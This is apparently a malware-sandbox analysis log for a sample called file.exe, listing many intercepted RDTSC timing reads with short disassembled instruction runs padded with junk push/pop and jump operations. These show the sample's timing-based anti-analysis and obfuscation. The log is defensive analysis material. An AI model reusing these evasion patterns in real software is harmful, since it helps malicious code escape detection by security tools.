                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BFA2 second address: C2BFA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BFA8 second address: C2BFAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2BFAC second address: C2BFDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jng 00007FA22C516E3Ah 0x00000012 push eax 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 mov eax, dword ptr [eax] 0x00000018 push ebx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA22C516E43h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B389 second address: C4B38F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B38F second address: C4B3A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B3A5 second address: C4B3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B540 second address: C4B55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FA22C516E47h 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B55C second address: C4B561 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B561 second address: C4B567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B82D second address: C4B845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FAEh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B845 second address: C4B858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FA22C516E36h 0x0000000a pop edi 0x0000000b push esi 0x0000000c jng 00007FA22C516E36h 0x00000012 pop esi 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B858 second address: C4B86E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB0h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B86E second address: C4B872 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B872 second address: C4B876 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B876 second address: C4B87C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B9EF second address: C4BA15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FAFh 0x00000009 jmp 00007FA22C835FB3h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BCFA second address: C4BD46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E48h 0x00000007 jmp 00007FA22C516E46h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007FA22C516E46h 0x00000014 push edx 0x00000015 pop edx 0x00000016 pop edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BE81 second address: C4BE95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FA22C835FAEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BE95 second address: C4BE9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BE9B second address: C4BEA0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BEA0 second address: C4BECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e jmp 00007FA22C516E49h 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BECA second address: C4BED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3F5C7 second address: C3F5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E3Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4C036 second address: C4C03A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4CA19 second address: C4CA53 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA22C516E59h 0x00000008 jmp 00007FA22C516E42h 0x0000000d jmp 00007FA22C516E41h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 pushad 0x00000017 popad 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b jl 00007FA22C516E36h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C21925 second address: C2193C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FA22C835FB2h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5159A second address: C515A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA22C516E36h 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53640 second address: C53645 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53C0F second address: C53C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C53E1B second address: C53E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C50F second address: C5C513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C513 second address: C5C517 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B9C9 second address: C5B9E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FA22C516E3Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FA22C516E36h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5B9E5 second address: C5BA17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB6h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f js 00007FA22C835FA6h 0x00000015 jmp 00007FA22C835FABh 0x0000001a pop ecx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5BDCE second address: C5BE28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007FA22C516E49h 0x0000000f jnl 00007FA22C516E47h 0x00000015 popad 0x00000016 push ecx 0x00000017 pushad 0x00000018 push edi 0x00000019 pop edi 0x0000001a jmp 00007FA22C516E41h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C0D0 second address: C5C0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA22C835FACh 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C0DC second address: C5C0F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA22C516E3Dh 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E2CD second address: C5E309 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA22C835FB9h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E309 second address: C5E30F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E30F second address: C5E313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E313 second address: C5E37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jo 00007FA22C516E3Eh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 pop edx 0x00000019 pop ecx 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push esi 0x0000001e call 00007FA22C516E38h 0x00000023 pop esi 0x00000024 mov dword ptr [esp+04h], esi 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc esi 0x00000031 push esi 0x00000032 ret 0x00000033 pop esi 0x00000034 ret 0x00000035 jg 00007FA22C516E37h 0x0000003b push 3F57603Fh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007FA22C516E43h 0x00000047 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5E792 second address: C5E7B6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FA22C835FB7h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5EA8A second address: C5EA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5EF6F second address: C5EF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA22C835FA6h 0x0000000a popad 0x0000000b pop edx 0x0000000c mov dword ptr [esp], ebx 0x0000000f mov di, bx 0x00000012 push eax 0x00000013 pushad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F0D8 second address: C5F0E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA22C516E38h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F0E8 second address: C5F0ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F1BA second address: C5F1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F421 second address: C5F425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F425 second address: C5F42F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F42F second address: C5F442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FAFh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F442 second address: C5F462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E3Bh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F539 second address: C5F53D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F53D second address: C5F59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA22C516E38h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 sbb edi, 459D9E47h 0x00000028 mov esi, dword ptr [ebp+122D187Bh] 0x0000002e xchg eax, ebx 0x0000002f jnc 00007FA22C516E44h 0x00000035 jmp 00007FA22C516E3Eh 0x0000003a push eax 0x0000003b pushad 0x0000003c pushad 0x0000003d jmp 00007FA22C516E3Eh 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5F59A second address: C5F5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA22C835FA6h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FB0C second address: C5FB41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA22C516E47h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007FA22C516E38h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA22C516E3Ch 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FB41 second address: C5FB45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FB45 second address: C5FB96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FA22C516E38h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov esi, dword ptr [ebp+122D2A22h] 0x0000002a push 00000000h 0x0000002c pushad 0x0000002d movsx edi, dx 0x00000030 call 00007FA22C516E3Dh 0x00000035 mov ax, 1700h 0x00000039 pop ecx 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jo 00007FA22C516E38h 0x00000044 push edx 0x00000045 pop edx 0x00000046 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5FB96 second address: C5FBA0 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C835FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C604F9 second address: C60511 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA22C516E3Dh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6203C second address: C62057 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C62B27 second address: C62B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C627DD second address: C627E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C62B2D second address: C62B31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C627E2 second address: C627F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64664 second address: C64668 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64668 second address: C64672 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64672 second address: C64691 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C516E3Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jno 00007FA22C516E36h 0x00000010 push esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push edx 0x00000017 jnp 00007FA22C516E3Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C64CA0 second address: C64CC9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA22C835FA8h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D1EF0h], edx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+122D2F3Dh], eax 0x0000001f push eax 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jp 00007FA22C835FA6h 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69C69 second address: C69C84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E45h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69C84 second address: C69C89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C69C89 second address: C69CA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jp 00007FA22C516E36h 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007FA22C516E3Eh 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C654C8 second address: C654E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B488 second address: C6B4D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+12472552h], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007FA22C516E38h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov ebx, edi 0x00000030 push 00000000h 0x00000032 mov ebx, 235F611Fh 0x00000037 push eax 0x00000038 push ecx 0x00000039 jc 00007FA22C516E3Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D44A second address: C6D450 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F443 second address: C6F4EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA22C516E47h 0x0000000b popad 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D26D5h], ecx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FA22C516E38h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f call 00007FA22C516E44h 0x00000034 mov dword ptr [ebp+1245A2CDh], ebx 0x0000003a pop edi 0x0000003b mov bh, ch 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007FA22C516E38h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 00000014h 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 jns 00007FA22C516E3Ah 0x0000005f push eax 0x00000060 pushad 0x00000061 push edx 0x00000062 jmp 00007FA22C516E48h 0x00000067 pop edx 0x00000068 push eax 0x00000069 push edx 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F4EC second address: C6F4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C67E89 second address: C67E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6B6F9 second address: C6B719 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA22C835FB3h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6D583 second address: C6D60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D3233h], edi 0x00000010 push esi 0x00000011 pop ebx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr [ebp+122D2782h], esi 0x0000001f mov dword ptr fs:[00000000h], esp 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FA22C516E38h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Ch 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 xor di, B47Ch 0x00000045 sub ebx, 790F6826h 0x0000004b mov eax, dword ptr [ebp+122D0D29h] 0x00000051 movzx edi, ax 0x00000054 push FFFFFFFFh 0x00000056 mov bl, F0h 0x00000058 nop 0x00000059 jnp 00007FA22C516E40h 0x0000005f push eax 0x00000060 pushad 0x00000061 jmp 00007FA22C516E41h 0x00000066 push eax 0x00000067 push edx 0x00000068 push edi 0x00000069 pop edi 0x0000006a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E500 second address: C6E505 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6E505 second address: C6E50C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
